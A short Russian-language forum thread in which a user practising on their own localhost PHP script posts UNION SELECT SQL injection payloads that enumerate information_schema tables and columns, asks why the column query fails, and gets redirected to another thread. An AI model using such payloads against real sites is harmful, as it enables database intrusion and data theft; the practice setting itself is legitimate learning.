![]() |
sql-inj
здравствуйте
http://localhost/view_cat.php?cat=-1+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.COLUMNS+where+table_name='user'+l imit+1,2 Не выводит ничего! Хотя запрос вида http://localhost/school/view_cat.php?cat=-1+union+select+1,2,table_name,4,5,6,7,8,9+from+inf ormation_schema.tables работатет и выводиться список всех таблиц,в чем моя ошибка? мне посоветовали перевести в hex Тогда такой вопрос? Зачем ?Если скрипт написал я сам для практики и никакой фильтрации там нет! |
Вообще то для подобных вопросов отведена специальная тема: http://forum.antichat.ru/thread46016.html
|
| Время: 17:49 |